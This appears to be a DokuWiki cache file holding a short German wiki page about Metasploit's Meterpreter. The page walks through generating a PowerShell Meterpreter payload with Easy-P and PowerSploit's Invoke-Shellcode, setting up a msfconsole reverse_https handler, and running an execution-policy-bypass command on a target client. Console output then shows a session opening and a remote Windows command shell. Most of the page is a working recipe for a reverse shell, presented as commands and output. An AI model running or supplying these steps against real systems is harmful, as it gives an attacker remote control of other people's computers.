a:96:{i:0;a:3:{i:0;s:14:"document_start";i:1;a:0:{}i:2;i:0;}i:1;a:3:{i:0;s:6:"header";i:1;a:3:{i:0;s:23:"Was ist der Meterpreter";i:1;i:1;i:2;i:1;}i:2;i:1;}i:2;a:3:{i:0;s:12:"section_open";i:1;a:1:{i:0;i:1;}i:2;i:1;}i:3;a:3:{i:0;s:13:"section_close";i:1;a:0:{}i:2;i:41;}i:4;a:3:{i:0;s:6:"header";i:1;a:3:{i:0;s:9:"Beispiele";i:1;i:2;i:2;i:41;}i:2;i:41;}i:5;a:3:{i:0;s:12:"section_open";i:1;a:1:{i:0;i:2;}i:2;i:41;}i:6;a:3:{i:0;s:6:"p_open";i:1;a:0:{}i:2;i:41;}i:7;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:70:"Ein mögliches Beispiel mit PowerShell und Easy-P und der msfconsole. ";}i:2;i:64;}i:8;a:3:{i:0;s:7:"p_close";i:1;a:0:{}i:2;i:134;}i:9;a:3:{i:0;s:6:"p_open";i:1;a:0:{}i:2;i:134;}i:10;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:46:"Easy-P kann über git heruntergeladen werden. ";}i:2;i:136;}i:11;a:3:{i:0;s:7:"p_close";i:1;a:0:{}i:2;i:182;}i:12;a:3:{i:0;s:6:"p_open";i:1;a:0:{}i:2;i:182;}i:13;a:3:{i:0;s:12:"externallink";i:1;a:2:{i:0;s:32:"https://github.com/cheetz/Easy-P";i:1;N;}i:2;i:184;}i:14;a:3:{i:0;s:7:"p_close";i:1;a:0:{}i:2;i:220;}i:15;a:3:{i:0;s:6:"p_open";i:1;a:0:{}i:2;i:220;}i:16;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:32:"Der Start erfolgt über Python 
";}i:2;i:223;}i:17;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:9:"code_code";i:1;a:4:{i:0;s:4:"code";i:1;s:4:"bash";i:2;s:0:"";i:3;s:18:"
python easy_p.py
";}i:2;i:3;i:3;s:24:" bash>
python easy_p.py
";}i:2;i:260;}i:18;a:3:{i:0;s:7:"p_close";i:1;a:0:{}i:2;i:291;}i:19;a:3:{i:0;s:6:"p_open";i:1;a:0:{}i:2;i:291;}i:20;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:73:"In meinen Fall möchte ich ein PowerShell Meterpreter erstellen. Press 4 ";}i:2;i:293;}i:21;a:3:{i:0;s:7:"p_close";i:1;a:0:{}i:2;i:366;}i:22;a:3:{i:0;s:6:"p_open";i:1;a:0:{}i:2;i:366;}i:23;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:87:"Auf der folgenden Webseite kann der Orginal PowerShell Meterpreter gedownloadet werden ";}i:2;i:368;}i:24;a:3:{i:0;s:12:"externallink";i:1;a:2:{i:0;s:91:"https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1";i:1;N;}i:2;i:455;}i:25;a:3:{i:0;s:7:"p_close";i:1;a:0:{}i:2;i:550;}i:26;a:3:{i:0;s:6:"p_open";i:1;a:0:{}i:2;i:550;}i:27;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:72:"Als nächstes wird die der LHOST als localhost angebenden und der LPORT ";}i:2;i:554;}i:28;a:3:{i:0;s:7:"p_close";i:1;a:0:{}i:2;i:626;}i:29;a:3:{i:0;s:6:"p_open";i:1;a:0:{}i:2;i:626;}i:30;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:9:"code_code";i:1;a:4:{i:0;s:4:"code";i:1;s:4:"bash";i:2;s:0:"";i:3;s:35:"
LHOST: 192.168.50.105
LPORT: 4444
";}i:2;i:3;i:3;s:41:" bash>
LHOST: 192.168.50.105
LPORT: 4444
";}i:2;i:633;}i:31;a:3:{i:0;s:7:"p_close";i:1;a:0:{}i:2;i:681;}i:32;a:3:{i:0;s:6:"p_open";i:1;a:0:{}i:2;i:681;}i:33;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:52:" In der msfconsole muss folgendes eingegeben werden.";}i:2;i:683;}i:34;a:3:{i:0;s:7:"p_close";i:1;a:0:{}i:2;i:735;}i:35;a:3:{i:0;s:6:"p_open";i:1;a:0:{}i:2;i:735;}i:36;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:9:"code_code";i:1;a:4:{i:0;s:4:"code";i:1;s:4:"bash";i:2;s:0:"";i:3;s:169:"
msfconsole -r listener.rc
use multi/handler 
set payload windows/meterpreter/reverse_https 
set LHOST 192.168.50.105
set LPORT 4444
set ExitOnSession false 
exploit -j
";}i:2;i:3;i:3;s:175:" bash>
msfconsole -r listener.rc
use multi/handler 
set payload windows/meterpreter/reverse_https 
set LHOST 192.168.50.105
set LPORT 4444
set ExitOnSession false 
exploit -j
";}i:2;i:742;}i:37;a:3:{i:0;s:7:"p_close";i:1;a:0:{}i:2;i:924;}i:38;a:3:{i:0;s:6:"p_open";i:1;a:0:{}i:2;i:924;}i:39;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:50:"Auf dem Zielclient muss folgendes Eingeben werden.";}i:2;i:926;}i:40;a:3:{i:0;s:7:"p_close";i:1;a:0:{}i:2;i:976;}i:41;a:3:{i:0;s:6:"p_open";i:1;a:0:{}i:2;i:976;}i:42;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:9:"code_code";i:1;a:4:{i:0;s:4:"code";i:1;s:10:"powershell";i:2;s:0:"";i:3;s:183:"
powershell.exe -exec bypass -Command "& {Import-Module .\Invoke-Shellcode.ps1; Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.50.105 -Lport 4444 -Force}"
";}i:2;i:3;i:3;s:195:" powershell>
powershell.exe -exec bypass -Command "& {Import-Module .\Invoke-Shellcode.ps1; Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.50.105 -Lport 4444 -Force}"
";}i:2;i:983;}i:43;a:3:{i:0;s:7:"p_close";i:1;a:0:{}i:2;i:1185;}i:44;a:3:{i:0;s:6:"p_open";i:1;a:0:{}i:2;i:1185;}i:45;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:45:"Danach kann man auf die session 1 zugreifen .";}i:2;i:1187;}i:46;a:3:{i:0;s:7:"p_close";i:1;a:0:{}i:2;i:1232;}i:47;a:3:{i:0;s:6:"p_open";i:1;a:0:{}i:2;i:1232;}i:48;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:7:"konsole";i:1;a:2:{i:0;i:1;i:1;s:11:"konsoleuser";}i:2;i:1;i:3;s:9:"<konsole>";}i:2;i:1234;}i:49;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:1:"
";}i:2;i:1243;}i:50;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:7:"konsole";i:1;a:2:{i:0;i:3;i:1;s:38:"[*] Exploit running as background job.";}i:2;i:3;i:3;s:38:"[*] Exploit running as background job.";}i:2;i:1244;}i:51;a:3:{i:0;s:7:"p_close";i:1;a:0:{}i:2;i:1282;}i:52;a:3:{i:0;s:6:"p_open";i:1;a:0:{}i:2;i:1282;}i:53;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:7:"konsole";i:1;a:2:{i:0;i:3;i:1;s:37:"[*] Started HTTPS reverse handler on ";}i:2;i:3;i:3;s:37:"[*] Started HTTPS reverse handler on ";}i:2;i:1284;}i:54;a:3:{i:0;s:12:"externallink";i:1;a:2:{i:0;s:21:"https://0.0.0.0:4444/";i:1;N;}i:2;i:1321;}i:55;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:1:"
";}i:2;i:1342;}i:56;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:7:"konsole";i:1;a:2:{i:0;i:3;i:1;s:55:"msf exploit(handler) > [*] Starting the payload handler";}i:2;i:3;i:3;s:55:"msf exploit(handler) > [*] Starting the payload handler";}i:2;i:1343;}i:57;a:3:{i:0;s:6:"entity";i:1;a:1:{i:0;s:3:"...";}i:2;i:1398;}i:58;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:1:"
";}i:2;i:1401;}i:59;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:7:"konsole";i:1;a:2:{i:0;i:3;i:1;s:110:"[*] 192.168.50.102:53495 (UUID: 8ce59193af0afda2/x86=1/windows=1/2015-11-02T19:15:48Z) Staging Native payload ";}i:2;i:3;i:3;s:110:"[*] 192.168.50.102:53495 (UUID: 8ce59193af0afda2/x86=1/windows=1/2015-11-02T19:15:48Z) Staging Native payload ";}i:2;i:1402;}i:60;a:3:{i:0;s:6:"entity";i:1;a:1:{i:0;s:3:"...";}i:2;i:1512;}i:61;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:1:"
";}i:2;i:1515;}i:62;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:7:"konsole";i:1;a:2:{i:0;i:3;i:1;s:54:"[*] Meterpreter session 1 opened (192.168.50.105:4444 ";}i:2;i:3;i:3;s:54:"[*] Meterpreter session 1 opened (192.168.50.105:4444 ";}i:2;i:1516;}i:63;a:3:{i:0;s:6:"entity";i:1;a:1:{i:0;s:2:"->";}i:2;i:1570;}i:64;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:7:"konsole";i:1;a:2:{i:0;i:3;i:1;s:51:" 192.168.50.102:53495) at 2015-11-02 20:15:49 +0100";}i:2;i:3;i:3;s:51:" 192.168.50.102:53495) at 2015-11-02 20:15:49 +0100";}i:2;i:1572;}i:65;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:1:"
";}i:2;i:1623;}i:66;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:7:"konsole";i:1;a:1:{i:0;i:4;}i:2;i:4;i:3;s:10:"</konsole>";}i:2;i:1624;}i:67;a:3:{i:0;s:7:"p_close";i:1;a:0:{}i:2;i:1634;}i:68;a:3:{i:0;s:6:"p_open";i:1;a:0:{}i:2;i:1634;}i:69;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:63:"Mit dem Kommando session kann man auf den Zielclient zugreifen.";}i:2;i:1636;}i:70;a:3:{i:0;s:7:"p_close";i:1;a:0:{}i:2;i:1699;}i:71;a:3:{i:0;s:6:"p_open";i:1;a:0:{}i:2;i:1699;}i:72;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:7:"konsole";i:1;a:2:{i:0;i:1;i:1;s:11:"konsoleuser";}i:2;i:1;i:3;s:9:"<konsole>";}i:2;i:1701;}i:73;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:1:"
";}i:2;i:1710;}i:74;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:7:"konsole";i:1;a:2:{i:0;i:3;i:1;s:36:"msf exploit(handler) > sessions -i 1";}i:2;i:3;i:3;s:36:"msf exploit(handler) > sessions -i 1";}i:2;i:1711;}i:75;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:1:"
";}i:2;i:1747;}i:76;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:7:"konsole";i:1;a:2:{i:0;i:3;i:1;s:31:"[*] Starting interaction with 1";}i:2;i:3;i:3;s:31:"[*] Starting interaction with 1";}i:2;i:1748;}i:77;a:3:{i:0;s:6:"entity";i:1;a:1:{i:0;s:3:"...";}i:2;i:1779;}i:78;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:1:"
";}i:2;i:1782;}i:79;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:7:"konsole";i:1;a:2:{i:0;i:3;i:1;s:19:"meterpreter > shell";}i:2;i:3;i:3;s:19:"meterpreter > shell";}i:2;i:1783;}i:80;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:1:"
";}i:2;i:1802;}i:81;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:7:"konsole";i:1;a:2:{i:0;i:3;i:1;s:21:"Process 1120 created.";}i:2;i:3;i:3;s:21:"Process 1120 created.";}i:2;i:1803;}i:82;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:1:"
";}i:2;i:1824;}i:83;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:7:"konsole";i:1;a:2:{i:0;i:3;i:1;s:18:"Channel 1 created.";}i:2;i:3;i:3;s:18:"Channel 1 created.";}i:2;i:1825;}i:84;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:1:"
";}i:2;i:1843;}i:85;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:7:"konsole";i:1;a:2:{i:0;i:3;i:1;s:38:"Microsoft Windows [Version 10.0.10240]";}i:2;i:3;i:3;s:38:"Microsoft Windows [Version 10.0.10240]";}i:2;i:1844;}i:86;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:1:"
";}i:2;i:1882;}i:87;a:3:{i:0;s:6:"entity";i:1;a:1:{i:0;s:3:"(c)";}i:2;i:1883;}i:88;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:7:"konsole";i:1;a:2:{i:0;i:3;i:1;s:53:" 2015 Microsoft Corporation. Alle Rechte vorbehalten.";}i:2;i:3;i:3;s:53:" 2015 Microsoft Corporation. Alle Rechte vorbehalten.";}i:2;i:1886;}i:89;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:1:"
";}i:2;i:1939;}i:90;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:7:"konsole";i:1;a:2:{i:0;i:3;i:1;s:8:"C:\temp>";}i:2;i:3;i:3;s:8:"C:\temp>";}i:2;i:1940;}i:91;a:3:{i:0;s:5:"cdata";i:1;a:1:{i:0;s:1:"
";}i:2;i:1948;}i:92;a:3:{i:0;s:6:"plugin";i:1;a:4:{i:0;s:7:"konsole";i:1;a:1:{i:0;i:4;}i:2;i:4;i:3;s:10:"</konsole>";}i:2;i:1949;}i:93;a:3:{i:0;s:7:"p_close";i:1;a:0:{}i:2;i:1959;}i:94;a:3:{i:0;s:13:"section_close";i:1;a:0:{}i:2;i:1965;}i:95;a:3:{i:0;s:12:"document_end";i:1;a:0:{}i:2;i:1965;}}